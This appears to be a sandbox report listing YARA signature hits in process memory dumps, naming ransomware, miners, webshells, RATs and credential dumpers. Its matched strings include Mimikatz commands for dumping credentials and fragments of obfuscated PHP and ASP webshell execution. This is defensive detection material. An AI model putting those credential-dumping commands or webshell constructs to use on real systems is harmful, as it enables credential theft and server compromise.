00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x17e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x17e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x1854d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x1857d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x1858d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x18af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x18b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp	Tofu_Backdoor	Detects Tofu Trojan	Cylance	0xb98f:$a: Cookies: Sym1.0 0xb930:$c: 66 0F FC C1 0F 11 40 D0 0F 10 40 D0 66 0F EF C2 0F 11 40 D0 0F 10 40 E0
00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	WScriptShell_Case_Anomaly	Detects obfuscated wscript.shell commands	Florian Roth	0x12e1d:$s1: WScript.Shell").run
00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x92:$payload7: eval(base64_decode( 0x8d:$php_short: <? 0x8d:$php_new2: <?php
00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000026.00000003.18297604848.00000138BD4A8000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18357184238.00000138BD9CA000.00000004.00000001.sdmp	JoeSecurity_Conti_ransomware	Yara detected Conti ransomware	Joe Security
00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2e9c9:$payload4: eval(gzuncompress(base64_decode 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x240b3:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x7e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x7e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x854d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x857d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x858d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x8af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x8b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp	APT_DeputyDog_Fexel	unknown	ThreatConnect Intelligence Research Team	0x1c789:$cUp: Upload failed! [Remote error code: 0x1c869:$GDGSYDLYR: GDGSYDLYR_%
00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	Amplia_Security_Tool	Amplia Security Tool	unknown	0x1e428:$a: Amplia Security 0x1e4f5:$e: extract the TGT session key
00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	REDLEAVES_DroppedFile_ImplantLoader_Starburn	Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT	USG	0x38436:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C 90 01 01 EB 90 01 01 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0x35bcc:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0x35bee:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x3c9bc:$s1: stratum+tcp://
00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0x3c069:$: OnlineTime= 0x3c0a7:$: clientpath= 0x3c0b6:$: serverpath=
00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	Hacktool_Strings_p0wnedShell	p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs	Florian Roth	0xad1b:$x3: lsadump::dcsync
00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0xacac:$s1: sekurlsa::msv 0xac96:$s2: sekurlsa::wdigest 0xac6b:$s4: sekurlsa::kerberos 0xac12:$s5: sekurlsa::tspkg 0xabfc:$s6: sekurlsa::livessp 0xabea:$s7: sekurlsa::ssp 0xabd4:$s9: sekurlsa::process 0xac3c:$s11: sekurlsa::pth 0xac26:$s12: sekurlsa::tickets 0xac82:$s13: sekurlsa::ekeys 0xab8f:$s14: sekurlsa::dpapi 0xab79:$s15: sekurlsa::credman
00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x195ff:$s1: stratum+tcp://
00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x81a5:$s1: stratum+tcp://
00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	PoisonIvy_3	unknown	Kevin Breen <kevin@techanarchy.net>	0x5570:$stub: StubPath 0x5607:$regvalue1: SOFTWARE\Classes\http\shell\open\command 0x5633:$regvalue2: Software\Microsoft\Active Setup\Installed Components\
00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x8d3e:$opbs48: se'.(32*2) 0x443c:$php_short: <? 0x977f:$php_short: <? 0x977f:$php_new2: <?php
00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0x8841:$asp_obf2: u"+"n"+"s 0x8b7a:$tagasp_short1: <%e 0x8b91:$tagasp_short2: %> 0x8b7a:$tagasp_long12: <%ex 0x8182:$tagasp_long20: <scriptlanguage="vb 0x981c:$asp_payload2: eval( 0x8264:$asp_payload8: execute( 0x82ae:$asp_payload8: execute( 0x8b2f:$asp_payload8: execute( 0x98b7:$asp_multi_payload_one3: .run 0xa719:$asp_multi_payload_one3: .run 0xbaba:$asp_multi_payload_one3: .run 0x4740:$asp_multi_payload_three2: Process
00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp	webshell_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0xa369:$asp_much_sus8: Webshell 0xbfcd:$asp_much_sus8: Webshell 0x8841:$asp_much_sus39: u"+"n"+"s 0x8b8b:$asp_gen_sus10: "cmd" 0x9740:$asp_gen_sus12: %comspec% 0x8102:$asp_gen_obf1: "+" 0x859e:$asp_gen_obf1: "+" 0x85e9:$asp_gen_obf1: "+" 0x85f4:$asp_gen_obf1: "+" 0x85ff:$asp_gen_obf1: "+" 0x8634:$asp_gen_obf1: "+" 0x863f:$asp_gen_obf1: "+" 0x864a:$asp_gen_obf1: "+" 0x867f:$asp_gen_obf1: "+" 0x868a:$asp_gen_obf1: "+" 0x8695:$asp_gen_obf1: "+" 0x86ca:$asp_gen_obf1: "+" 0x86d5:$asp_gen_obf1: "+" 0x86e0:$asp_gen_obf1: "+" 0x8715:$asp_gen_obf1: "+" 0x8720:$asp_gen_obf1: "+"
00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x3e9c9:$payload4: eval(gzuncompress(base64_decode 0x2a84:$php_short: <? 0x7ac6:$php_short: <? 0x7e13:$php_short: <? 0x1f9fa:$php_short: <? 0x1fa63:$php_short: <? 0x1facc:$php_short: <? 0x1fb35:$php_short: <? 0x1fb9e:$php_short: <? 0x340b3:$php_short: <? 0x4cda9:$php_short: <? 0x50b28:$php_short: <? 0x1f9fa:$php_new2: <?php 0x1fa63:$php_new2: <?php 0x1facc:$php_new2: <?php 0x1fb35:$php_new2: <?php 0x1fb9e:$php_new2: <?php
00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x17e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x17e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x1854d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x1857d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x1858d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x18af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x18b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	korlia	unknown	Nick Hoffman	0x2e99c:$d: 00 62 69 73 6F 6E 61 6C 00
00000026.00000003.18352805869.00000138BD221000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	SUSP_XORed_Mozilla	Detects suspicious XORed keyword - Mozilla/5.0	Florian Roth	0xffa5:$xo1: Ik~mhhe+1*4
00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2e9c9:$payload4: eval(gzuncompress(base64_decode 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x240b3:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x7e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x7e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x854d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x857d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x858d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x8af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x8b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000001.00000003.14714384382.000002DEA1411000.00000004.00000001.sdmp	LokiBot_Dropper_Packed_R11_Feb18	Auto-generated rule - file scan copy.pdf.r11	Florian Roth	0x1798:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp	HackTool_MSIL_SharPersist_2	unknown	FireEye	0x232fa:$a1: SharPersist.lib 0x2330e:$a2: SharPersist.exe 0x23322:$b1: ERROR: Invalid hotkey location option given. 0x23353:$b2: ERROR: Invalid hotkey given. 0x23374:$b3: ERROR: Keepass configuration file not found. 0x233a5:$b4: ERROR: Keepass configuration file was not found. 0x233da:$b5: ERROR: That value already exists in: 0x23403:$b6: ERROR: Failed to delete hidden registry key. 0x23434:$pdb1: \SharPersist\ 0x23446:$pdb2: \SharPersist.pdb
00000026.00000003.18324581744.00000138BDC1C000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18324581744.00000138BDC1C000.00000004.00000001.sdmp	xtremrat	Xtrem RAT v3.5	Jean-Philippe Teissier / @Jipe_	0x3bfc2:$a: XTREME 0x3bfd4:$a: XTREME 0x3bfd4:$b: XTREMEBINDER
00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	JoeSecurity_LimeRAT	Yara detected LimeRAT	Joe Security
00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x3e9c9:$payload4: eval(gzuncompress(base64_decode 0x1f9fa:$php_short: <? 0x1fa63:$php_short: <? 0x1facc:$php_short: <? 0x1fb35:$php_short: <? 0x1fb9e:$php_short: <? 0x340b3:$php_short: <? 0x4cda9:$php_short: <? 0x50b28:$php_short: <? 0x1f9fa:$php_new2: <?php 0x1fa63:$php_new2: <?php 0x1facc:$php_new2: <?php 0x1fb35:$php_new2: <?php 0x1fb9e:$php_new2: <?php
00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x17e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x17e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x1854d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x1857d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x1858d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x18af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x18b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18330538197.00000138BE396000.00000004.00000001.sdmp	WScriptShell_Case_Anomaly	Detects obfuscated wscript.shell commands	Florian Roth	0x12e1d:$s1: WScript.Shell").run
00000026.00000003.18330538197.00000138BE396000.00000004.00000001.sdmp	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x22185:$payload2: eval(gzinflate(base64_decode( 0x1acb:$php_short: <? 0x24e2:$php_short: <? 0x24f6:$php_short: <? 0x11a7f:$php_short: <? 0x2110f:$php_short: <? 0x3041d:$php_short: <? 0x3046b:$php_short: <? 0x3041d:$php_new2: <?php 0x3046b:$php_new2: <?php
00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	webshell_php_dynamic_big	PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k	Arnim Rupp	0x3041d:$new_php2: <?php 0x3046b:$new_php2: <?php 0x30422:$dynamic1: $_system($ 0x1fdb7:$dynamic5: $__() 0x2f2ca:$gen_bit_sus11: "cmd.exe 0xe848:$gen_bit_sus12: %comspec% 0x1a27e:$gen_bit_sus46: shell_ 0x1a2d1:$gen_bit_sus46: shell_ 0x31fcc:$gen_bit_sus47: Shell 0x2068a:$gen_bit_sus50: bypass 0x20740:$gen_bit_sus50: bypass 0x1f2bc:$gen_bit_sus55: e'.'v 0x1f2c0:$gen_bit_sus55: v'.'a 0x1f2c4:$gen_bit_sus55: a'.'l 0x1f2d4:$gen_bit_sus55: z'.'i 0x1f2d9:$gen_bit_sus55: n'.'f 0x1f2dd:$gen_bit_sus55: f'.'l 0x21d52:$gen_bit_sus56: m"."d 0x21d58:$gen_bit_sus56: e"."x 0x2094b:$gen_bit_sus59: 'cmd' 0x34beb:$gen_bit_sus62: Cyber
00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	webshell_php_by_string_obfuscation	PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming	Arnim Rupp	0x1f2bc:$opbs18: e'.'v'.'a'.'l 0x1acb:$php_short: <? 0x24e2:$php_short: <? 0x24f6:$php_short: <? 0x11a7f:$php_short: <? 0x2110f:$php_short: <? 0x3041d:$php_short: <? 0x3046b:$php_short: <? 0x3041d:$php_new2: <?php 0x3046b:$php_new2: <?php
00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x216a2:$s1: stratum+tcp://
00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x3518b:$x1: reflectively inject a dll into a process. 0x35171:$x4: reflective_inject_dll 0x35228:$x4: reflective_inject_dll 0x35171:$x8: reflective_inject_dll 0x35228:$x8: reflective_inject_dll 0x35228:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x9791:$s1: stratum+tcp://
00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000026.00000003.18316462962.00000138BD524000.00000004.00000001.sdmp	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x5af9:$one6: Shell Environ$("COMSPEC") & " /c
00000026.00000003.18316462962.00000138BD524000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000026.00000003.18358332585.00000138BD221000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	JoeSecurity_LimeRAT	Yara detected LimeRAT	Joe Security
00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	APT9002Strings	9002 Identifying Strings	Seth Hardy	0xe76:$: %%TEMP%%\%s_p.ax
00000026.00000003.18340288495.00000138BCB46000.00000004.00000001.sdmp	RemCom_RemoteCommandExecution	Detects strings from RemCom tool	Florian Roth	0x34c6:$: \\.\pipe\%s%s%d
00000026.00000003.18340288495.00000138BCB46000.00000004.00000001.sdmp	JoeSecurity_RemComRemoteAdmin	Yara detected RemCom RemoteAdmin tool	Joe Security
00000026.00000003.18357503095.00000138BE2D0000.00000004.00000001.sdmp	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0x2ec46:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0x2eb23:$rat2: rat.(Core).generateBeacon 0x2eb40:$rat3: rat.gJitter 0x2eb4e:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0x2ebb4:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0x2ec1c:$rat8: rat/modules/netsweeper.(Pinger).listen 0x2ec46:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0x2ec74:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0x2eafa:$winblows: rat/platforms/win.(winblows).GetStage
00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	APT_MAL_Sandworm_Exaramel_Configuration_Key	Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[...	FR/ANSSI/SDO	0x2f87c:$: odhyrfjcnfkdtslt
00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x164e:$payload7: eval(base64_decode( 0x1639:$php_short: <? 0x24ad:$php_short: <? 0x22817:$php_short: <? 0x1639:$php_new2: <?php 0x24ad:$php_new2: <?php
00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x1704:$s1: stratum+tcp://
00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x2b383:$x1: 78 34 4E 6A 4E 63 65 44 63 79 58 48 67 0x2bb8e:$x1: 78 34 4E 54 4E 63 65 44 59 7A 58 48 67 0x2bb9e:$x1: 78 34 4E 6A 6C 63 65 44 63 77 58 48 67
00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp	webshell_php_gzinflated	PHP webshell which directly eval()s obfuscated string	Arnim Rupp	0x2e9c9:$payload4: eval(gzuncompress(base64_decode 0xf9fa:$php_short: <? 0xfa63:$php_short: <? 0xfacc:$php_short: <? 0xfb35:$php_short: <? 0xfb9e:$php_short: <? 0x240b3:$php_short: <? 0x3cda9:$php_short: <? 0x40b28:$php_short: <? 0xf9fa:$php_new2: <?php 0xfa63:$php_new2: <?php 0xfacc:$php_new2: <?php 0xfb35:$php_new2: <?php 0xfb9e:$php_new2: <?php
00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp	SUSP_Base64_Encoded_Hex_Encoded_Code	Detects hex encoded code that has been base64 encoded	Florian Roth	0x7e27:$x1: 78 34 4E 7A 68 63 65 44 4D 32 58 48 67 0x7e37:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x854d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x857d:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x858d:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67 0x8af7:$x1: 78 34 4E 7A 68 63 65 44 4D 33 58 48 67 0x8b07:$x1: 78 34 4E 57 4E 63 65 44 63 34 58 48 67
00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp	TA17_293A_malware_1	inveigh pen testing tools & related artifacts	US-CERT Code Analysis Team (modified by Florian Roth)	0x554d:$n1: file:// 0x1fb17:$n1: file:// 0x1ffaf:$ax2: 5.153.58.45
00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0xdc22:$s1: stratum+tcp://
00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	ZxShell_Jul17	Detects a ZxShell - CN threat group	Florian Roth	0x2a3d7:$x13: c:\windows\keylog.txt
00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x21c2e:$s1: stratum+tcp:// 0x21cf9:$s1: stratum+tcp://
00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	gh0st	unknown	https://github.com/jackcr/	0x2d86f:$b: Gh0st Update
00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	CoinMiner_Strings	Detects mining pool protocol string in Executable	Florian Roth	0x14b18:$s1: stratum+tcp:// 0x155ac:$s1: stratum+tcp:// 0x16958:$s1: stratum+tcp:// 0x16c80:$s1: stratum+tcp://
00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0x1056:$tagasp_short1: <%g 0xfcd3:$tagasp_short2: %> 0x8b87:$tagasp_classid2: F935DC22-1CF0-11D0-ADB9-00C04FD58A0B 0xb800:$asp_payload2: eval( 0xb80f:$asp_payload2: eval( 0x8a87:$asp_payload11: wscript.shell 0x935f:$asp_payload11: wscript.shell 0xea6b:$asp_payload11: wscript.shell 0x8a79:$asp_multi_payload_one1: CreateObject 0x9351:$asp_multi_payload_one1: CreateObject 0xb7a6:$asp_multi_payload_one1: createobject 0xea5d:$asp_multi_payload_one1: createobject 0xeff7:$asp_multi_payload_one1: createobject 0xf8c4:$asp_multi_payload_one1: CreateObject 0xc20:$asp_multi_payload_one3: .run 0xd80:$asp_multi_payload_one3: .run 0xea8a:$asp_multi_payload_one3: .run 0xefb0:$asp_multi_payload_one3: .run 0x95b6:$asp_multi_payload_three2: Process 0x8a79:$asp_multi_payload_four1: CreateObject 0x9351:$asp_multi_payload_four1: CreateObject
